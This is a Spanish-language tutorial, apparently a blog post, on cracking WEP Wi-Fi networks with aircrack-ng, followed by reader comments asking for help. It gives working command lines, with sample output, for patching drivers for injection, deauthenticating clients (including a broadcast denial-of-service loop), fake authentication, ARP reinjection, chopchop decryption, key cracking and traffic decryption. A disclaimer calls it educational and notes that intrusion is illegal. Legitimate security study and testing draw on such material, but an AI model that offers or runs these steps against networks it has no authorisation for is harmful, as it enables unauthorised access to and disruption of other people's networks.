http://www.aircrack-ng.org/doku.php?id=aircrack-ng.es

Este manual se ha creado a partir de otros muchos encontrados en la red y en base a la experiencia con el propio programa. Su fin es meramente educativo. El acceso a redes protegidas para conseguir datos de sus usuarios así como usar sus servicios como propios es totalmente ilegal.

Configuración Hardware

En la misma página podemos encontrar más información sobre el hardware compatible.

En principio, hay una versión para Windows, pero por compatibilidad con el hardware y que no hay posibilidad de inyectar tráfico, usaremos la versión de Linux, sobre Ubuntu 7.04, que es fácil y rápida de instalar.
Es importante un mínimo de conocimientos sobre el manejo del shell (Terminal), que nadie se asuste, con cd (cambio de directorios) y poco más nos basta.

Funciona correctamente con los drivers que te instala automáticamente para tarjetas basadas en rt2500, concretamente he probado “conceptronic usb c54ru”, y “obislink pcmcia”, y el mismo aircrack las pone en modo monitor (escucha), necesario para captar las redes e inyectar tŕafico.

Estas tarjetas aunque dan buenos resultados, pero su alcance es corto así que como no seamos un manitas y les soldemos una antena, o la red es muy cercana o la señal no será suficiente.
Para SMC CWPCITT-G, una tarjeta wíreless pci, no podía usar los drivers propietarios, así que he tenido que instalar los drivers de madwifi, y parchearlos para la inyección de tráfico. Están en el Web, no son difíciles de encontrar.

Debemos seguir estos pasos dentro del shell (debemos hacerlo con privilegios de administrador, “root”, del sistema, para ello añadimos sudo antes de cada comando):

Asegurar que tenemos instalado los compiladores, si no recurrir a synaptic (g , gcc,…)

En negrita pondré lo que debéis teclear, precedidos del sudo y dentro de la carpeta del driver.

ifconfig ath0 down
ifconfig wifi0 down
rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal ath_rate_amrr 2>/dev/null
cd madwifi-ng
patch -Np1 -i ../madwifi-ng-r2277.patch
make
make install
depmod -ae
modprobe ath_pci

Para que nos los cargue automáticamente al arrancar el so debemos añadir el alias:

sudo gedit /etc/modprobe.b/aliases

y añadimos:

alias ath0 ath_pci

al final del archivo, guardamos y listo.

Además deberemos teclear cada vez que iniciemos el sistema y vayamos a usar aircrack:
sudo wlanconfig ath0 destroy
sudo modprobe -r ath_pci
sudo modprobe ath_pci autocreate=monitor

Recordar que este sólo es para la SMC pci basada en atheros.
El motivo de que me extienda con la configuración de esta tarjeta pese a ser algo tediosa, es por que con unos 40 € de inversión en una tarjeta pci, y una antena omnidireccional de 6 db también SMC, se consiguen unos resultados excelentes.

Pasemos a aircrack.

Primeros compilamos con make para generar los ejecutables, dentro de la carpeta de aircrack.
En primer lugar usamos airodump para ver las redes que captamos, para ello usamos un shell:
sudo ./airodump -ng ath0
ath0 en mi caso es la interface de la inalámbrica (ra0, rausb0,…); podemos verlo en la administración de red de Ubuntu.
Con esto vemos el tráfico por pantalla

BSSID PWR Beacons # Data CH MB ENC ESSID

00:13:10:30:24:9C 46 15 3416 6 54. WEP the ssid
00:09:5B:1F:44:10 36 54 0 11 11 OPN NETGEAR

BSSID STATION PWR Packets Probes

00:13:10:30:24:9C 00:09:5B:EB:C5:2B 48 719 the ssid
00:13:10:30:24:9C 00:02:2D:C1:5D:1F 190 17 the ssid

En la parte superior tenemos las redes, y en la inferior los clientes asociados.
Características:

Field Description
BSSID Dirección MAC del punto de acceso.
PWR Nivel de señal reportado por la tarjeta. Su significado depende del controlador, pero conforme te acercas al punto de acceso o a la estación la señal aumenta. Si PWR == -1, el controlador no soporta reportar el nivel de señal.
Beacons Número de paquetes-anuncio enviados por el AP. Cada punto de acceso envía unos diez beacons por segundo al ritmo (rate) mínimo (1M), por lo que normalmente pueden ser recogidos desde muy lejos.
# Data Número de paquetes de datos capturados (si es WEP, sólo cuenta IVs), incluyendo paquetes de datos de difusión general.
CH Número de canal (obtenido de los paquetes beacon). Nota: algunas veces se capturan paquetes de datos de otros canales aunque no se esté alternando entre canales debido a las interferencias de radiofrecuencia.
MB Velocidad máxima soportada por el AP. Si MB = 11, entonces se trata de 802.11b, si MB = 22 entonces es 802.11b y velocidades mayores son 802.11g.
ENC Algoritmo de encriptación en uso. OPN = sin encriptación, “WEP?” = WEP o mayor (no hay suficiente datos para distinguir entre WEP y WPA), WEP (sin la interrogación) indica WEP estática o dinámica, y WPA si TKIP o CCMP están presentes.
ESSID Conocida como “SSID”, puede estar vacía si el ocultamiento de SSID está activo. En este caso airodump tratará de recuperar el SSID de las respuestas a escaneos y las peticiones de asociación.
STATION Dirección MAC de cada estación asociada. En la captura de más arriba se han detectado dos clientes (00:09:5B:EB:C5:2B y 00:02:2D:C1:5D:1F).

Ahora vamos con aireplay, para ello usemos otro shell:
Si el controlador está correctamente parcheado, aireplay es capaz de inyectar paquetes 802.11 en modo Monitor en bruto; actualmente implementa un conjunto de 5 ataques diferentes.
Nos centraremos en 1, 3, 4 que han sido los más efectivos. El 0 y 2 no me han resultado útiles.
Si recibes el mensaje “ioctl(SIOCGIFINDEX) failed: No such device”, revisa que el nombre de tu dispositivo es correcto y que no has olvidado un parámetro en la línea de comandos.
En los siguientes ejemplos, 00:13:10:30:24:9C es la dirección MAC del punto de acceso, 00:09:5B:EB:C5:2B es la dirección MAC de un cliente inalámbrico y 00:11:22:33:44:55 la propia.

Ataque 0: deautenticación
Este ataque es probablemente el más útil para recuperar un ESSID oculto (no difundido) y para capturar “saludos” WPA forzando a los clientes a reautenticarse. También puede ser usado para generar peticiones ARP en tanto que los clientes Windows a veces vacían su cache de ARP cuando son desconectados. Desde luego, este ataque es totalmente inservible si no hay clientes asociados.
Normalmente es más efectivo fijar como blanco una estación específica usando el parámetro -c.
Algunos ejemplos:
Captura del “saludo” WPA una Atheros
airmon.sh start ath0
airodump ath0 out 6 (cambia a otra consola)
aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
(espera unos segundos)
aircrack -w /ruta/al/diccionario out.cap
Generar peticiones ARP con una tarjeta Prism2
airmon.sh start wlan0
airodump wlan0 out 6 (cambia a otra consola)
aireplay -0 10 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
Después de enviar tres tandas de paquetes de deautenticación, comenzamos a escuchar en busca de peticiones ARP con el ataque 3. La opción -h es esencial y debe ser la dirección MAC de un cliente asociado.
Si el controlador es wlan-ng, debes ejecutar el script airmon.sh; de otro modo la tarjeta no estará preparada correctamente para la inyección.
Denegación de servicio masiva con una tarjeta RT2500
airmon.sh start ra0
aireplay -0 0 -a 00:13:10:30:24:9C ra0
Con el parámetro 0, este ataque enviará en un bucle infinito paquetes de deautenticación a las direcciones de broadcast, evitando así que los clientes permanezcan conectados.

Ataque 1: autenticación falsa
Este ataque es particularmente útil cuando no hay clientes asociados: creamos la dirección MAC de un cliente falso, la cual quedará registrada en la tabla de asociación del AP. Esta dirección será usada para los ataques 3 (reinyección de peticiones ARP) y 4 (desencriptación WEP “chopchop”).
De todos modos si este ataque falla y hay ya un cliente asociado, es más efectivo usar simplemente su dirección MAC (aquí, 00:09:5B:EB:C5:2B) para los ataques 3 y 4.
Si no conocemos nuestra Mac (aunque hay muchas formas de saberlo), os diré una forma de saberla en el ataque 3.

sudo ./aireplay-ng -1 0 -e “el ssid” -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful
Puede ocurrir que debas usarlo varias veces seguidas para que funcione.
Algunos puntos de acceso requieren de reautenticación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica:
sudo ./aireplay-ng -1 30 -e “el ssid” -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Si este ataque parece fallar (aireplay permanece enviando paquetes de petición de autenticación), puede que esté siendo usado un filtrado de direcciones MAC. Asegúrate también de que:
• Estás lo suficientemente cerca del punto de acceso.
• El controlador está correctamente parcheado e instalado.
• La tarjeta está configurada en el mismo canal que el AP.
• El BSSID y el ESSID (opciones -a / -e) son correctos.
• Si se trata de Prism2, asegúrate de que el firmware está actualizado.
Como recordatorio: no puedes inyectar con un chipset Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell o Broadcom debido a limitaciones de firmware y/o controlador.

Ataque 2: Reenvío interactivo de paquetes
Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona resultados más efectivos que el ataque 3 (reinyección automática de ARP).
Podrías usarlo, por ejemplo, para intentar el ataque “redifundir cualesquiera datos”, el cuál sólo funciona si el AP realmente reencripta los paquetes de datos WEP:
aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0
También puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP encriptacas con WEP, cuyo tamaño es bien 68 o 86 bytes (dependiendo del sistema operativo):
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0

Ataque 3: Reinyección de petición ARP
El clásico ataque de reinyección de petición ARP es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. Necesitas o bien la dirección MAC de un cliente asociado (00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1 (00:11:22:33:44:55). Puede que tengas que esperar un par de minutos, o incluso más, hasta que aparezca una petición ARP; este ataque fallará si no hay tráfico.
Por favor, fíjate en que también puedes reutilizar una petición ARP de una captura anterior usando el interruptor -r.
sudo ./aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets…
Si utilizais despues de -h una MAC asociada, os saldrá un mensaje diciendo que no coincide con vuestra MAC, y os la sacará en la consola, ahí la tenéis (esa es la vuestra).

Ataque 4: El “chopchop” de KoreK (predicción de CRC)
Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela meramente el texto plano. De cualquier modo, la mayoría de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Este ataque necesita al menos un paquete de datos WEP.
sudo ./aireplay-ng -4 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B ath0
Podemos utilizar la Mac propia después de -h si hemos utilizado antes el ataque 1 de forma satisfactoria.
Por experiencia 1 y 3 es la combinación ideal.
Volvemos al shell anterior, el de airodump y usamos Ctrl C para pararlo, y relanzarlo, ahora especificaremos el canal y el archivo donde queremos guardar los paquetes capturados:
sudo ./airodump -ng ath0 –channel X -w file

Si todo va bien deberemos empezar a capturar Ivs , es decir, data aumente de forma continua y a una velocidad decente en un par de minutos.
¿Cuántos IVs se necesitan para crackear WEP ?

El crackeo WEP no es una ciencia exacta. El número de IVs necesarios depende de la longitud de la clave WEP, y también de la suerte. Normalmente, una clave WEP de 40-bit puede ser crackeada con 300.000 IVs, y una de 104-bit con 1.000.000 de IVs; teniendo mala suerte se pueden necesitar dos millones de IVs, o más.
No hay ninguna manera de saber la longitud de la clave WEP: esta información está oculta y nunca es anunciada, guardada bien en paquetes de gestión, bien en paquetes de datos; como consecuencia, airodump no puede reportar la longitud de la clave WEP. Por ese motivo, se recomienda ejecutar aircrack dos veces: cuando tienes 250.000 IVs, inicias aircrack con “-n 64″ para crackear la WEP de 40-bit. Si no la sacas, vuelves a iniciar aircrack (sin la opción -n) para crackear la WEP de 104-bit.

Una vez capturados los suficientes aproximadamente usamos aircrack:
sudo ./aircrack-ng -c -s file-01.cap

Opciones de aircrack:

Opción Param. Descripción
-a amode Fuerza el tipo de ataque (1 = WEP estática, 2 = WPA-PSK).
-e essid Si se especifica, se usarán todos los IVs de las redes con el mismo ESSID. Esta opción es necesaria en el caso de que el ESSID no esté abiertamente difundido en un crackeo WPA-PSK (ESSID oculto).
-b bssid Selecciona la red elegida basándose en la dirección MAC.
-p nbcpu En sistemas SMP , especifica con esta opción el número de CPUs.
-q none Activa el modo silencioso (no muestra el estado hasta que la clave es o no encontrada).
-c none (crackeo WEP) Limita la búsqueda a caracteres alfanuméricos sólamente (0×20 - 0×7F).
-d start (crackeo WEP) Especifica el comienzo de la clave WEP (en hex), usado para depuración.
-m maddr (crackeo WEP) Dirección MAC para la que filtrar los paquetes de datos WEP. Alternativamente, especifica -m ff:ff:ff:ff:ff:ff para usar todos y cada uno de los IVs, indiferentemente de la red que sea.
-n nbits (crackeo WEP) Especifica la longitud de la clave: 64 para WEP de 40-bit , 128 para WEP de 104-bit , etc. El valor predeterminado es 128.
-i index (crackeo WEP) Conserva sólo los IVs que tienen este índice de clave (1 a 4). El comportamiento predeterminado es ignorar el índice de la clave.
-f fudge (crackeo WEP) De forma predeterminada, este parámetro está establecido en 2 para WEP de 104-bit y en 5 para WEP de 40-bit. Especifica un valor más alto para elevar el nivel de fuerza bruta: el crackeo llevará más tiempo, pero con una mayor posibilidad de éxito.
-k korek (crackeo WEP) Hay 17 ataques de tipo estadístico de korek. A veces un ataque crea un enorme falso positivo que evita que se obtenga la clave, incluso con grandes cantidades de IVs. Prueba -k 1, -k 2, … -k 17 para ir desactivando cada uno de los ataques de forma selectiva.
-x none (crackeo WEP) No aplicar fuerza bruta sobre los dos últimos keybytes.
-y none (crackeo WEP) Éste es un ataque de fuerza bruta experimental único que debería ser usado cuando el método normal de ataque falle con más de un millón de IVs.
-w words (WPA cracking) Ruta hacia la lista de palabras.

Si hemos capturados más de un archivo, los ponemos a continuación del primero y aircrack usara todos.
Por experiencia, si tarda más de 4-5 minutos en sacar la clave, podéis olvidaros. Mejor capturar más paquetes.

Si todo funciona, ya la tenemos, yuju!!!!!!!!

Pero aun nos queda otro problema, si el router no tiene habilitado DHCP, y la puerta de enlace no es la habitual para usar IP estática (las típicas 192.168.1.1 y 192.168.0.1), no podemos saber si es correcta.

Para encontrar la puerta de enlace usamos airdecap sobre uno de los archivo cap que hemos utilizado, da igual que sea pequeño, con que contenga 30 IVs ya vale.

sudo ./airdecap-ng -w clave_wep_obtenida file.cap

La clave wep la escribiremos en hexadecimal y sin usar puntos para separarla.

Si la clave es correcta, escribe en el shell un mensaje con el número de paquetes que se han desencriptado, esta claro que ha de ser mayor de 0, no?

Si ha ido bien tendremos un nuevo file.cap pero de la forma file-dec.cap

Si habrimos este archivo con ethereal, otro programita disponible en el gestor de paquetes synaptic, hay tendremos la dirección de la puerta de enlace.

Todo el proceso si va bien durará unas 2 horas aprox., la mayoría lo pasa airodump captando paquetes (aunque puede tardar más).

-intel(r) PRO/wireless 2200BG network connection y….
- REALTEK RTL8139/810x family Gibabit ethernet NIC

y no sé que drivers tengo que instalarl para que me funcione el airodump…:( alguien los sabe?????? Gracias

Tengo todo instalado, pero la descarga de IVs es muy lenta…
¿hay alguna manera de “agilizar” la entrada de IVs??

a la velocidad q va en 5 meses tendré el millon de IVs…

que puede estar mal?

SALUDOS

por que yo no lo consigo encontrar..aunqeu bueno, hay qeu decir que estoy un poko dormida…
pro que ya lo intente..y no consigo encontrar si es hermes o la otra que se me ha olvidado el nombre, qeu torpe estoy…

si veo qeu tampoco se os ocurre, pues probare con las 2 a ver que me cuenta!!!

muchas gracias!!

pro cierto me encanta el caracolillo este en planm jedi…
y qeu decir qeu muchas gracas pro la informacion y la explicacion..me ha parecido supersencilla….veremo despues con el yo y la practica!!!